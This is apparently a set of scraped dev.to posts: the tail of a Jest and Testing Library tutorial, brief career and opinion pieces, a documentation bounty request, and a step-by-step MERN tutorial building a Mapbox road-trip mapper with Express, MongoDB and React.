      console.log('this is test case in sub-describe')
      expect(2 + 2).toBe(4)
    })
  })
})
```
_Can you spot the order in the example above?_
My terminal log:
- this is describe
- this is sub-describe
- this is test case in describe
- this is test case in sub-describe
### Mock function
I think the most powerful feature of Jest is its mock functions: we can capture a callback's `params`, mock objects created with the `new` keyword, and customize return values.
This is an example:
```tsx
function plusTwoNumbers(
  list: Array<number>,
  callback: (a: number, b: number) => void,
) {
  callback(list[0], list[1])
}

test('mock function callback', () => {
  const mockFnc = jest.fn((a, b) => console.log('total:', a + b))
  plusTwoNumbers([1, 2], mockFnc)
})
```
We mock the `callback` function, capture its `params`, and customize the result: `console.log("total:", a + b)`.
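If it helps to demystify what `jest.fn` gives you, here is a toy re-implementation of its call-recording behavior in plain JavaScript (purely a mental model — `makeMockFn` is a name I made up, and Jest's real mocks do far more):

```javascript
// Toy sketch of jest.fn — records every call's arguments, then delegates
// to the supplied implementation. NOT Jest's actual implementation.
function makeMockFn(impl = () => undefined) {
  const mockFn = (...args) => {
    mockFn.mock.calls.push(args); // what expect(...).toHaveBeenCalledWith inspects
    return impl(...args);
  };
  mockFn.mock = { calls: [] };
  return mockFn;
}

const mock = makeMockFn((a, b) => a + b);
mock(1, 2);
// mock.mock.calls → [[1, 2]]
```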
We are also able to mock modules, e.g. I use `uuid` in order to generate a unique `id`.
When I move on to testing, instead of using `uuid`, I can mock the `uuid` module like the code below:
Normally, whenever I call `uuid.v4()` I will get a random value like this: `5442486-0878-440c-9db1-a7006c25a39f`
But I want my value to be `1234`, I can use the code below:
```tsx
import * as uuid from 'uuid'
jest.mock('uuid')

test('mock uuid module', () => {
  uuid.v4.mockReturnValue('1234')
  console.log('uuid.v4()', uuid.v4())
  // 1234
})
```
Otherwise, I can use `mockImplementation` to customize.
```tsx
uuid.v4.mockImplementation(() => '1234')
```
_`mockImplementation` is the function that we customize the function that is created from other modules._
### Config Jest
I'm going to introduce the most important configs in Jest.
Let's go!
- `collectCoverageFrom`
This config tells Jest exactly where to collect coverage information from. It is very useful:
Run `jest --coverage` in order to figure out which components and functions still need tests, and discover the spots we haven't tested yet.
- `moduleDirectories`
This config points to the `module` that we will use in the `test` file.
By default, it is configured as `["node_modules"]`, and we are able to use the modules under the `node_modules` folder in our test cases.
- `moduleNameMapper`
This config provides for us the ability to access the resources, based on the place that we have set.
```tsx
moduleNameMapper: {
  "assets/(*)": [
    "<rootDir>/images/$1"
  ]
}
```
See the example above: now we have set the path `assets/(*)` to point to `<rootDir>/images/$1`.
If I set `assets/logo.png`, Jest will find `<rootDir>/images/logo.png`.
- `rootDir`
By default, it is the place that contains `jest.config.js`, `package.json`.
The place is where Jest will find to use `modules`, and run test cases.
It turns out I can set `rootDir: '__test__'` and run test cases without configuring `roots`, but I shouldn't do this.
- `roots`
This config sets the places where our test files live.
For example:
If I set:
```tsx
roots: ['pages/']
```
then, because I write tests in the `__test__` folder, which is at the same level as `pages/`, no test cases will be run with the config above. I need to change `pages/` -> `__test__`.
- `testMatch`
We use this config to tell Jest which files we want to test; otherwise, skip it!
- `testPathIgnorePatterns`
This config exists so we can tell Jest to ignore files under a given path.
- `transform`
Sometimes, in our test cases, we write some new code that `node` doesn't support at all, so we need to transform it into code that Jest can understand.
If my project uses `typescript`, I need to set up a transform to turn the `typescript` into `javascript` code that node can understand.
- `transformIgnorePatterns`
We might have some files, some folders we don't want to transform, so we use this config.
### How to write test
We need to write tests in order to be more confident about the code that we wrote. So when we think about test cases, the core concept is that we have to think about the use case, not about the code. It means we must focus on the features that the code supports for users.
This is the main concept when we think about creating `test cases`.
e.g:
I have created a react-hook in order to support four features below:
1. returns the value in first data using first property, condition true.
2. returns the value in second data using second property, condition false.
3. returns the value in second data using first property, condition false.
4. returns the default value with second data undefined, condition false.
```tsx
import * as React from 'react'

type Props<F, S> = {
  condition: boolean
  data: [F, S]
}

function useInitialState<F, S>({condition, data}: Props<F, S>) {
  const giveMeState = React.useCallback(
    (
      property: keyof F,
      anotherProperty: S extends undefined ? undefined : keyof S | undefined,
      defaultValue: Array<string> | string | number | undefined,
    ) => {
      return condition
        ? data[0][property]
        : data[1]?.[anotherProperty ?? (property as unknown as keyof S)] ??
            defaultValue
    },
    [condition, data],
  )
  return {giveMeState}
}

export {useInitialState}
```
So I only need to write four test cases for the four features above:
```tsx
import {useInitialState} from '@/utils/hooks/initial-state'
import {renderHook} from '@testing-library/react-hooks'

describe('useInitialState', () => {
  const mockFirstData = {
    name: 'Thang',
    age: '18',
  }

  test('returns the value in first data using first property, condition true', () => {
    const mockSecondData = {
      name: 'Phan',
      age: 20,
    }
    const {result} = renderHook(() =>
      useInitialState({
        condition: Boolean(mockFirstData),
        data: [mockFirstData, mockSecondData],
      }),
    )
    const data = result.current.giveMeState('name', undefined, '')
    expect(data).toBe(mockFirstData.name)
  })

  test('returns the value in second data using second property, condition false', () => {
    const mockSecondData = {
      firstName: 'Phan',
      age: 20,
    }
    const {result} = renderHook(() =>
      useInitialState({
        condition: Boolean(false),
        data: [mockFirstData, mockSecondData],
      }),
    )
    const data = result.current.giveMeState('name', 'firstName', '')
    expect(data).toBe(mockSecondData.firstName)
  })

  test('returns the value in second data using first property, condition false', () => {
    const mockSecondData = {
      name: 'Phan',
      age: 20,
    }
    const {result} = renderHook(() =>
      useInitialState({
        condition: Boolean(false),
        data: [mockFirstData, mockSecondData],
      }),
    )
    const data = result.current.giveMeState('name', undefined, '')
    expect(data).toBe(mockSecondData.name)
  })

  test('returns the default value with second data undefined, condition false', () => {
    const mockDefaultValue = 21
    const {result} = renderHook(() =>
      useInitialState({
        condition: Boolean(false),
        data: [mockFirstData, undefined],
      }),
    )
    const data = result.current.giveMeState('age', undefined, mockDefaultValue)
    expect(data).toBe(mockDefaultValue)
  })
})
```
### Testing Library
Let's take a quick review of the main things in _Testing Library_.
- **getBy..**: we find the DOM element, throw error if no element is found.
- **queryBy..**: we find the DOM element, return null if no element is found.
- **findBy..**: we find the DOM element, throw an error if no element is found,
the search process is a promise.
The list below is the priority order we should use, so that our tests are closer to the way our app is actually used.
- _getByRole_
- _getByLabelText_
- _getByAltText_
- _getByDisplayValue_
For example:
I have a component that contains two components: `AutoAddress` and `Address`. I need to find the use cases that I want to support in order to create test cases.
This is a test case: `by default, name value of inputs was set`.
1. render the components
2. create the mockResult value
3. add assertions
```tsx
test('by default, name of address input was set', async () => {
  render(
    <AutoAddress wasSubmitted={false}>
      <Address wasSubmitted={false} />
    </AutoAddress>,
  )
  const mockResult = {
    namePrefectureSv: 'prefertureSv',
    namePrefectureSvLabel: 'prefectureSvLabel',
    nameCity: 'city',
  }
  expect(screen.getByLabelText('Prefecture Code')).toHaveAttribute(
    'name',
    mockResult.namePrefectureSv,
  )
  expect(screen.getByLabelText('Prefecture')).toHaveAttribute(
    'name',
    mockResult.namePrefectureSvLabel,
  )
  expect(screen.getByLabelText('City')).toHaveAttribute(
    'name',
    mockResult.nameCity,
  )
})
```
And this is a test case: `returns one address through postCode`.
1. render the components
2. create the mockResult value
3. mock the request API
4. input the postCode
5. click the search button
6. add assertions
```tsx
test('returns one address through postCode', async () => {
  const mockResult = [
    {
      id: '14109',
      zipCode: '1880011',
      prefectureCode: '13',
      city: 'Tokyo',
    },
  ]
  server.use(
    rest.get(
      `${process.env.NEXT_PUBLIC_API_OFF_KINTO}/${API_ADDRESS}`,
      (req, res, ctx) => {
        return res(ctx.json(mockResult))
      },
    ),
  )
  render(
    <AutoAddress wasSubmitted={false}>
      <Address wasSubmitted={false} />
    </AutoAddress>,
  )
  // input the post code value
  userEvent.type(screen.getByLabelText('first postCode'), '111')
  userEvent.type(screen.getByLabelText('second postCode'), '1111')
  // search the address
  userEvent.click(screen.getByRole('button', {name: /search address/i}))
  // wait for the search process to finish
  await waitForElementToBeRemoved(() =>
    screen.getByRole('button', {name: /searching/i}),
  )
  const address = mockResult[0]
  const {prefectureCode, city} = address
  expect(screen.getByLabelText('Prefecture Code')).toHaveAttribute(
    'value',
    prefectureCode,
  )
  expect(screen.getByLabelText('Prefecture')).toHaveAttribute(
    'value',
    PREFECTURE_CODE[prefectureCode as keyof typeof PREFECTURE_CODE],
  )
  expect(screen.getByLabelText('City')).toHaveAttribute('value', city)
})
```
### Recap
We just learned the main concepts of testing a React app! Let's recap some key points.
- Asynchronous tests need to have `return` in front of the `promise`.
- We are able to control testing using _Jest_ configs.
- When thinking about test cases, we must forget about the code and focus on the use case.
- The order of DOM methods in _Testing Library_. | thangphan37 |
895,577 | Fastest way get your first developer job | Do you know the shortest path between two points? ...its a straight line. When trying to get your... | 0 | 2021-11-11T19:07:44 | https://dev.to/scottstern06/fastest-way-get-your-first-eng-gig-92b | codenewbie, webdev, beginners, career | Do you know the shortest path between two points?
...it's a straight line.
When trying to get your first job as a software developer there's a lot of stuff you don't know.
It might seem like a good idea to learn python, and ruby, and javascript, and java (because java kinda sounds like javascript)
Well... when money is tight and you need to get a job, it's crucial to reflect on your goal (getting a job) and how you can get there from your current situation.
I recommend focusing on basic frontend technologies using HTML, CSS, and Javascript to build a simple game.
Idk, something simple like: every time you click a die, it rolls a new number 1-6.
Simple and fun.
Then deploy it.....
That's valuable.
What's not valuable is... going through ANOTHER tutorial on something you'll never use in your career.
Anywhoooooo...
It's not about how hard you work; it's about how hard you work doing the RIGHT things.
***If you want more:***
- Come join our Facebook group to help you get your first job as a software engineer, career development, and so much more!
https://www.facebook.com/groups/310120400851953
- Here is a [link](https://engjobresources.carrd.co/) to top 10 interview resources
| scottstern06 |
898,150 | Sparkly skull ✨ | A post by Jayant Goel | 0 | 2021-11-14T20:28:57 | https://dev.to/jayantgoel001/sparkly-skull-2ldn | codepen | {% codepen https://codepen.io/Mamboleoo/pen/yLbxYdx %} | jayantgoel001 |
913,705 | You DON'T need these to be a web dev | "If you don't know all of these, don't call yourself a web developer", followed by some list of web... | 0 | 2021-12-01T00:18:43 | https://dev.to/nitzanhen/you-dont-need-these-to-be-a-web-dev-c3b | webdev, beginners, javascript, programming | *"If you don't know all of these, don't call yourself a web developer"*, followed by some list of web dev related terms. Have you encountered one of these posts before? I come across them every once in a while on social media.
These sorts of divisive claims bring about nothing but toxicity to our community, and only alienate the junior developers who are new to it. Especially for the profit of some traffic on Twitter or elsewhere, it's despicable.
They paint a completely wrong image of the web dev scene, too - being a web developer is much more about the perpetual process of self-improving, learning new tools & technologies and experimenting with methods to combine them in the best way, rather than knowing some constant list of terms (which are often occasionally useful at best). And, built on top of the open-source industry, the web dev industry is one of the most welcoming industries out there, to programmers of any caliber.
So, to be perfectly clear - **you don't need to know [closures](https://stackoverflow.com/questions/111102/how-do-javascript-closures-work), [the event loop](https://nodejs.org/en/docs/guides/event-loop-timers-and-nexttick/), [hoisting](https://www.digitalocean.com/community/tutorials/understanding-hoisting-in-javascript), etc. to be a web developer**. The same goes for non-niche concepts & technologies - you can be a good dev without knowing [Docker](https://docs.docker.com/get-started/overview/), [FP](https://www.infoworld.com/article/3613715/what-is-functional-programming-a-practical-guide.html)/[OOP](https://searchapparchitecture.techtarget.com/definition/object-oriented-programming-OOP) or [cloud computing](https://azure.microsoft.com/en-us/overview/what-is-cloud-computing/), for example. Knowledge is always good to have, so if you're not familiar with them you should aspire to learn them sometime, but you can also be a damn good developer without them.
I think my personal journey is a good indication of this point: I first encountered web development close to three years ago, when I began my mandatory service; beforehand I knew some Java, from school and from coding as a hobby. The "tutoring" I received consisted of one half-baked, 30-minute lesson on the basics of HTML, and my "training period" consisted of watching some YouTube tutorials for close to two weeks, after which I was already being assigned tasks (that I was obviously not ready for).
Virtually all of my knowledge and experience was gained on-the-job, much of it through ad-hoc googling, and it was months before I actually went back and strengthened my knowledge on the fundamentals. And, for an even longer time, concepts like [CORS](https://www.youtube.com/watch?v=4KHiSt0oLJ0), [XSS](https://owasp.org/www-community/attacks/xss/) and [Virtual DOM](https://reactjs.org/docs/faq-internals.html) remained unclear to me.
It's not like I'm at the top of the industry today (still working on it!) but I've definitely gained a lot of experience and knowledge as a web developer, and have created some awesome projects along the way. **And you can too!** don't let anybody deter you from it.
My bottom line is - don't let any random list of technical terms discredit your journey as a developer. *Be proud of what you know*, and be curious in what you don't.
And, perhaps most importantly, be a good person; see people, not their labels, and invest energy in helping them improve instead of discouraging them from doing so. | nitzanhen |
914,378 | 20 ICP(About $800) Bounty for Developer web3 | 20 ICPs, with 10 ICPs bonus for docs site task: @Astrox_Network's "agent_dart" api... | 0 | 2021-12-01T15:39:00 | https://dev.to/utadamaaya/20-icpabout-800-bounty-for-developer-web3-40cf | flutter, dart, blockchain, rust | **20 ICPs, with 10 ICPs bonus for docs site**
task: @Astrox_Network's "agent_dart" api doc
link:https://github.com/AstroxNetwork/agent_dart/issues/13
**Acceptance Criteria:**
[comment on code to cover all apis]
[generate dart docs]
[optional generate gitbook or github pages]
[optional tutorial/docs site for developers]
**Context:**
For client developers, understanding how the SDK works is the best way to gain a better understanding of the Internet Computer.
Though we have ported most agent-js features to agent_dart, we don't have enough resources to complete the API docs, which are really important for community developers.
Thus, we need to cover as many apis as possible, we need someone to comment on code like we do for dart code. | utadamaaya |
916,243 | Building a Fullstack Road trip mapper app using the absolute power of MERN stack 🔥 | This article concentrates on the most critical tasks and concepts for better understanding and... | 0 | 2021-12-10T16:30:27 | https://aviyel.com/post/1430/fullstack-road-trip-mapper-app-built-using-mern-stack?utm_source=dev_to&utm_medium=articles_project_tutorials&utm_campaign=post_1430 | react, javascript, mern, webdev | This article concentrates on the most critical tasks and concepts for better understanding and building MERN stack applications from the ground up. It's for folks who are serious about learning about the MERN stack and want to concentrate on the essentials. We'll build a full-stack road trip mapper application where users can pin and map locations and view the sites pinned by other users, all using the MERN stack and leveraging the power of the Mapbox API. This blog session will teach you the fundamentals of MERN stack technology as well as advanced concepts and operations.
***Here's a quick preview of our application's final version:***




There is a separate article where you may learn about the MERN stack in very great detail.
[https://aviyel.com/post/1278](https://aviyel.com/post/1278/crafting-a-stunning-crud-application-with-mern-stack)
***Setting up the folder structure***
Create two folders inside your project directory called client and server, then open them in Visual Studio Code or any other code editor of your choice.


Now, we'll create a MongoDB database, a Node and Express server, a database schema to represent our project case study application, and API routes to create, read, update, and delete data and information from the database using npm and the appropriate packages. So, open a command prompt, navigate to your server's directory, and then run the code below.
```bash
npm init -yes
```
***Configuring package.json file***
Execute the following commands in the terminal to install the dependencies.
```bash
npm install cors dotenv express express-rate-limit mongoose nodemon body-parser helmet morgan rate-limit-mongo
```

- Dotenv: Dotenv is a zero-dependency module that loads environment variables from a .env file into process.env
- cors: This module allows to relax the security applied to an API
- express: Fast, unopinionated, minimalist web framework for node.
- express-rate-limit: Basic IP rate-limiting middleware for Express. It is used to limit repeated requests to public APIs and/or endpoints such as password reset.
- mongoose: It is an Object Data Modeling library for MongoDB and Node.js
- nodemon: This module helps to develop node.js based applications by automatically restarting the application when file changes in the directory are detected.
- body-parser: Node.js body parsing middleware.
- helmet: Helmet.js fills in the gap between Node.js and Express.js by securing HTTP headers that are returned by Express applications.
- morgan : HTTP request logger middleware for node.js
- rate-limit-mongo : MongoDB store for the express-rate-limit middleware.

The "package.json" file should look like this after the dependencies have been installed.

Also, remember to update the scripts.

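The scripts section typically ends up looking something like this (a sketch — the `src/index.js` entry path matches the file we create next; adjust if yours differs):
```
"scripts": {
  "start": "node src/index.js",
  "dev": "nodemon src/index.js"
}
```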
Now go to your server directory, create a src folder, and an index.js file there.
***Setting up index.js***
- Import express module.
- Import and configure dotenv module
- Import helmet module.
- Import morgan module.
- Import CORS module
- Use express() to initialize our app.
```javascript
//src/index.js
const express = require('express');
// NOTE morgan is a logger
const morgan = require('morgan');
const helmet = require('helmet');
const cors = require('cors');
const mongoose = require('mongoose');
require('dotenv').config();
// app config
const app = express();
```
We can now use all of the other methods on that app instance. Let's start with the fundamentals and a very basic setup. Don't forget to configure the port and CORS, too.
```javascript
const express = require('express');
// NOTE morgan is a logger
const morgan = require('morgan');
const helmet = require('helmet');
const cors = require('cors');
const mongoose = require('mongoose');
require('dotenv').config();
const app = express();
const port = process.env.PORT || 4000;
app.use(morgan('common'));
app.use(helmet());
app.use(cors({
origin: process.env.CORS_ORIGIN,
}));
app.use(express.json());
app.get('/', (req, res) => {
res.json({
message: 'Hello There',
});
});
```
Now it's time to connect our server application to a real database. Here we'll use the MongoDB database, specifically the MongoDB cloud Atlas version, which means our database will be hosted on their cloud.
### Setting up MongoDB Atlas cloud cluster
MongoDB is an open-source, cross-platform, document-oriented database. It is a NoSQL database that stores data in JSON-like documents with optional schemas. All versions released prior to October 16, 2018 were distributed under the AGPL license; all versions released after that date, including bug fixes for prior versions, are covered by the SSPL license v1. You can learn more about MongoDB setup and configuration in the following article.
[https://aviyel.com/post/1323](https://aviyel.com/post/1323/building-a-calorie-journal-saas-based-project-using-mern-stack)
To set up and start your MongoDB cluster, follow the exact same steps mentioned below.
***Official MongoDB website****

***Sign-up MongoDB***

***Sign-in to MongoDB***

***Create a Project***

***Adding members***

***Building Database***

***Creating a Cluster***

***Selecting a cloud service Provider***

***Configuring Security***

***Database Deployment to the Cloud***

***Navigate to the network access tab and select "Add IP address."***

***Now, select the Choose a connection method.***

***Connecting to cluster***

Create a new variable called DATABASE_CONNECTION inside index.js and assign it the MongoDB connection URL you copied, replacing the placeholder (brackets included) with your own username and password. We'll move the credentials into environment variables to safeguard them shortly, but for now, let's add the string this way. The second thing we'll need is a PORT, so just use 4000 for now. Finally, we'll use mongoose to connect to our database: call mongoose.connect(), which takes two parameters. The first is the DATABASE_CONNECTION string; the second is an options object with two settings, useNewUrlParser and useUnifiedTopology, both enabled. These options are not strictly required, but without them mongoose prints warnings on the console. If you like, you can also chain .then() and .catch() onto mongoose.connect() to log a success message, or the error if the connection to the database fails. Then call app.listen() with two arguments: the PORT and a callback that runs once our application is up. Your index.js file should now look something like this.
```javascript
//src/index.js
const express = require('express');
// NOTE morgan is a logger
const morgan = require('morgan');
const helmet = require('helmet');
const cors = require('cors');
const mongoose = require('mongoose');
require('dotenv').config();
const app = express();
const DATABASE_CONNECTION = process.env.DATABASE_URL;
mongoose.connect(DATABASE_CONNECTION, {
useNewUrlParser: true,
useUnifiedTopology: true,
});
app.use(morgan('common'));
app.use(helmet());
app.use(cors({
origin: process.env.CORS_ORIGIN,
}));
app.use(express.json());
app.get('/', (req, res) => {
res.json({
message: 'Hello There',
});
});
const port = process.env.PORT || 4000;
app.listen(port, () => {
console.log(`Currently Listening at http://localhost:${port}`);
});
```
***Insert mongodb+srv into the .env file.***
```
PORT=4000
DATABASE_URL=mongodb+srv://pramit:<password>@cluster0.8tw83.mongodb.net/myFirstDatabase?retryWrites=true&w=majority
CORS_ORIGIN=http://localhost:3000
```
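One detail worth remembering: dotenv exposes every value from the `.env` file as a string on `process.env`. This hypothetical snippet (not part of the project files) simulates a loaded environment instead of calling `require('dotenv').config()`:

```javascript
// Every environment variable arrives as a string, even numeric-looking ones.
process.env.PORT = "4000";

console.log(typeof process.env.PORT); // string

// The server code falls back to 4000 when PORT is unset:
const port = process.env.PORT || 4000;
console.log(port); // 4000 (note: still a string here, which app.listen() accepts)
```

If you ever need a real number (for arithmetic, say), wrap the value in `Number()`.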
Now that we have successfully connected our server to the database, let's create some middleware before we start building our backend application's routes and database schema. To do so, create a new file called middlewares.js and, within that file, create two functions named notFound and errorHandler, and export them. Let's start with the notFound middleware. Typically this should be the last route-handling middleware registered, and it takes req, res, and next. If a request ever makes it here, it means we didn't locate the route the user was searching for, so we create an Error with a message and pass it to the next middleware, the errorHandler, but before that, don't forget to set a response status of 404 as well. Now let's write the errorHandler middleware, which has four parameters instead of three: (error, req, res, next). The first thing we'll do is determine the status code: if it is still 200 we use 500, otherwise we keep the status code that has already been set. We then set that status code on the response and respond with some JSON that displays the error message.
```javascript
//middlewares.js
const notFound = (req, res, next) => {
const error = new Error(`Not Found - ${req.originalUrl}`);
res.status(404);
next(error);
};
const errorHandler = (error, req, res, next) => {
const statusCode = res.statusCode === 200 ? 500 : res.statusCode;
res.status(statusCode);
res.json({
message: error.message,
stack: process.env.NODE_ENV === "production" ? "nope" : error.stack,
});
};
module.exports = {
notFound,
errorHandler,
};
```
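The status-code rule inside `errorHandler` is easy to miss: if the response status is still the default `200` when an error reaches the handler, it is reported as a `500`; otherwise the status already set (such as the `404` from `notFound`) is kept. A tiny standalone sketch of that rule (the helper name is hypothetical, not part of the project files):

```javascript
// Mirrors the statusCode line in errorHandler above.
const pickStatusCode = (currentStatus) =>
  currentStatus === 200 ? 500 : currentStatus;

console.log(pickStatusCode(200)); // 500 (an unhandled error on a "successful" response)
console.log(pickStatusCode(404)); // 404 (keeps the status notFound already set)
console.log(pickStatusCode(422)); // 422 (keeps a validation status)
```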
So, after modifying the middlewares.js file, import and use the middleware as needed in the index.js file.
```javascript
//src/index.js
const express = require("express");
// NOTE morgan is a logger
const morgan = require("morgan");
const helmet = require("helmet");
const cors = require("cors");
const mongoose = require("mongoose");
require("dotenv").config();
const middlewares = require("./middlewares");
const app = express();
const DATABASE_CONNECTION = process.env.DATABASE_URL;
mongoose.connect(DATABASE_CONNECTION, {
useNewUrlParser: true,
useUnifiedTopology: true,
});
app.use(morgan("common"));
app.use(helmet());
app.use(
cors({
origin: process.env.CORS_ORIGIN,
})
);
app.use(express.json());
app.get("/", (req, res) => {
res.json({
message: "Hello There",
});
});
app.use(middlewares.notFound);
app.use(middlewares.errorHandler);
const port = process.env.PORT || 4000;
app.listen(port, () => {
console.log(`Currently Listening at http://localhost:${port}`);
});
```
Let's create a LogEntry model. Create a folder called models and, inside it, a file called LogEntry.model.js. Within that file, structure your DB schema by defining title, description, comments, image, rating, latitude, and longitude as shown below.
```javascript
//models/LogEntry.model.js
const mongoose = require("mongoose");
const { Schema } = mongoose;
const requiredNumber = {
type: Number,
required: true,
};
const logEntrySchema = new Schema(
{
title: {
type: String,
required: true,
},
description: String,
comments: String,
image: String,
rating: {
type: Number,
min: 0,
max: 10,
default: 0,
},
latitude: {
...requiredNumber,
min: -90,
max: 90,
},
longitude: {
...requiredNumber,
min: -180,
max: 180,
},
visitDate: {
required: true,
type: Date,
},
},
{
timestamps: true,
}
);
const LogEntry = mongoose.model("collections", logEntrySchema);
module.exports = LogEntry;
```
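Note how the schema reuses `requiredNumber` through the object spread operator. This standalone sketch (independent of mongoose) shows what the `latitude` field definition expands to:

```javascript
// Plain-object demonstration of the spread used in the schema above.
const requiredNumber = { type: Number, required: true };
const latitude = { ...requiredNumber, min: -90, max: 90 };

console.log(latitude.required); // true
console.log(latitude.min);      // -90
console.log(latitude.max);      // 90
```

Reusing a shared fragment this way keeps the two coordinate fields consistent with each other.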
The structure of your files and folders should now look like this.

Now that we've successfully created our DB schema, let's get started on the routes for our backend application. To do so, create a new folder inside the src directory named routes. Within the routes folder, create a file called logs.routes.js. First, import Router from "express", configure the router, and import our recently created DB schema. Now we can begin adding our routes.

```javascript
const { Router } = require("express");
const LogEntry = require("../models/LogEntry.model.js");
const { API_KEY } = process.env;
const router = Router();
```
***fetches all the pinned location information.***
```javascript
router.get("/", async (req, res, next) => {
try {
const entries = await LogEntry.find();
res.json(entries);
} catch (error) {
next(error);
}
});
```
***Insert/add a pinned location with authorized access***
```javascript
router.post("/", async (req, res, next) => {
try {
if (req.get("X-API-KEY") !== API_KEY) {
res.status(401);
throw new Error("Unauthorized Access");
}
const logEntry = new LogEntry(req.body);
const createdEntry = await logEntry.save();
res.json(createdEntry);
} catch (error) {
if (error.name === "ValidationError") {
res.status(422);
}
next(error);
}
});
```
***exporting the router***
```javascript
module.exports = router;
```
Your logs.routes.js should look something like this:
```javascript
//src/routes/logs.routes.js
const { Router } = require("express");
const LogEntry = require("../models/LogEntry.model.js");
const { API_KEY } = process.env;
const router = Router();
router.get("/", async (req, res, next) => {
try {
const entries = await LogEntry.find();
res.json(entries);
} catch (error) {
next(error);
}
});
router.post("/", async (req, res, next) => {
try {
if (req.get("X-API-KEY") !== API_KEY) {
res.status(401);
throw new Error("Unauthorized Access");
}
const logEntry = new LogEntry(req.body);
const createdEntry = await logEntry.save();
res.json(createdEntry);
} catch (error) {
if (error.name === "ValidationError") {
res.status(422);
}
next(error);
}
});
module.exports = router;
```
***Now, update your .env file***
```
NODE_ENV=production
PORT=4000
DATABASE_URL=mongodb+srv://pramit:<password>@cluster0.8tw83.mongodb.net/myFirstDatabase?retryWrites=true&w=majority
CORS_ORIGIN=http://localhost:3000
API_KEY=roadtripmapper
```
Let's finish by importing the logs routes into your index.js file and mounting them as express middleware, which connects the pinned map log info to our application. Finally, your root index.js file should look like the following.
```javascript
//src/index.js
const express = require("express");
// NOTE morgan is a logger
const morgan = require("morgan");
const helmet = require("helmet");
const cors = require("cors");
const mongoose = require("mongoose");
require("dotenv").config();
const middlewares = require("./middlewares");
const logs = require("./routes/logs.routes.js");
const app = express();
const DATABASE_CONNECTION = process.env.DATABASE_URL;
mongoose.connect(DATABASE_CONNECTION, {
useNewUrlParser: true,
useUnifiedTopology: true,
});
app.use(morgan("common"));
app.use(helmet());
app.use(
cors({
origin: process.env.CORS_ORIGIN,
})
);
app.use(express.json());
app.get("/", (req, res) => {
res.json({
message: "Hello There",
});
});
app.use("/api/logs", logs);
app.use(middlewares.notFound);
app.use(middlewares.errorHandler);
const port = process.env.PORT || 4000;
app.listen(port, () => {
console.log(`Currently Listening at http://localhost:${port}`);
});
```
After restarting the server, you should see something like this:

---
### Setting up the frontend with react
In the next step, let's start with the frontend and build it with React. The first thing you need to do is install Node.js if it isn't already installed on your machine, so go to the official Node.js website and download the most recent version. You'll need Node.js to use the node package manager, generally known as npm. Now navigate to the client folder in your favorite code editor; Visual Studio Code will be my tool of choice. Then, in the integrated terminal, run `npx create-react-app .` (note the trailing dot) to scaffold the React application inside the current client directory.

There is a separate article where you can learn everything there is to know about cleaning up a boilerplate React project.
[https://aviyel.com/post/1190](https://aviyel.com/post/1190/building-a-react-application-from-absolute-scratch)
Now that you've installed and cleaned up the React boilerplate, it's time to install some packages, so copy and paste the following command into your terminal.
```bash
npm i react-hook-form react-map-gl react-rating-stars-component react-responsive-animate-navbar
```

- react-hook-form: Performant, flexible, and extensible forms library for React Hooks.
- react-map-gl: react-map-gl is a suite of React components designed to provide a React API for Mapbox GL JS-compatible libraries
- react-rating-stars-component: Simple star rating component for your React projects.
- react-responsive-animate-navbar : simple, flexible & completely customizable responsive navigation bar component.

After installing all these packages, the client's package.json file should look like this:

Now that we've installed all of our project's dependencies, let's create a components folder inside src, and within it two separate folders named RoadTripNav and TripEntryForm.
Your file and folder structure should look something like this once you've added all of your components.

Now that you have all of the project's components set up, it's time to start coding. First, import the ReactNavbar from "react-responsive-animate-navbar", customize the color of your navbar, add the logo to the public folder and reference it directly, and don't forget to add some social links as well. The following is an example of how the code should appear.

```javascript
// components/RoadTripNav
import React from "react";
import * as ReactNavbar from "react-responsive-animate-navbar";
// import roadTripSvg from "../../assets/roadtrip.svg";
const RoadTripNav = () => {
return (
<ReactNavbar.ReactNavbar
color="rgb(25, 25, 25)"
logo="./logo.svg"
menu={[]}
social={[
{
name: "Twitter",
url: "https://twitter.com/pramit_armpit",
icon: ["fab", "twitter"],
},
]}
/>
);
};
export default RoadTripNav;
```
Before we go any further, let's set up our Mapbox. First, go to the Mapbox site and log in or sign up if you don't already have an account. Next, create your own custom map style in the Mapbox Studio and publish it. Finally, go back to the dashboard and copy the default public API key provided by MapBox.

***Login or create your MapBox account***

***Click on design a custom map style***

***Customize your own style of the map inside the Mapbox studio***

***Copy the default public token***

After you've successfully obtained your public token, go to the .env file (or create one if you don't have it), create a variable named REACT_APP_MAPBOX_TOKEN, and paste the token into it. This is what your .env file should look like.
```
REACT_APP_MAPBOX_TOKEN= ************************************ // add token
```
Before we go any further, let's make api and styles folders in our root source directory. Inside the api folder, make an API.js file, and inside the styles folder, make an index.css file where all the application's styles will be added. This is how your folder structure should appear.

Now go to the newly created API file and write two functions: listLogEntries, to collect all the log entries from the backend, and createLogEntries, to create entries, i.e. send the POST request to the backend. Export both functions, and don't forget to include the URL where your server is running.

```javascript
//api/API.js
const API_URL = "http://localhost:4000";
// const API_URL = window.location.hostname === "localhost" ? "http://localhost:4000" : "https://road-trip-map-mern.herokuapp.com" ;
export async function listLogEntries() {
const response = await fetch(`${API_URL}/api/logs`);
// const json = await response.json();
return response.json();
}
export async function createLogEntries(entry) {
const api_key = entry.api_key;
delete entry.api_key;
const response = await fetch(`${API_URL}/api/logs`, {
method: "POST",
headers: {
"content-type": "application/json",
"X-API-KEY": api_key,
},
body: JSON.stringify(entry),
});
// const json = await response.json();
// return response.json();
let json;
if (response.headers.get("content-type").includes("text/html")) {
const message = await response.text();
json = {
message,
};
} else {
json = await response.json();
}
if (response.ok) {
return json;
}
const error = new Error(json.message);
error.response = json;
throw error;
}
```
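The slightly subtle part of `createLogEntries` is that the form's `api_key` field travels as the `X-API-KEY` header rather than in the JSON body. A hypothetical helper (not in the original `API.js`) that isolates just that transformation:

```javascript
// Split a form entry into fetch options: api_key becomes a header,
// everything else becomes the JSON body.
function splitEntry(entry) {
  const { api_key, ...rest } = entry;
  return {
    headers: { "content-type": "application/json", "X-API-KEY": api_key },
    body: JSON.stringify(rest),
  };
}

const { headers, body } = splitEntry({ api_key: "secret", title: "Trip" });
console.log(headers["X-API-KEY"]); // secret
console.log(body);                 // {"title":"Trip"}
```

This matches what the server's POST route expects, since it reads the key with `req.get("X-API-KEY")` and validates the rest of the body against the schema.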
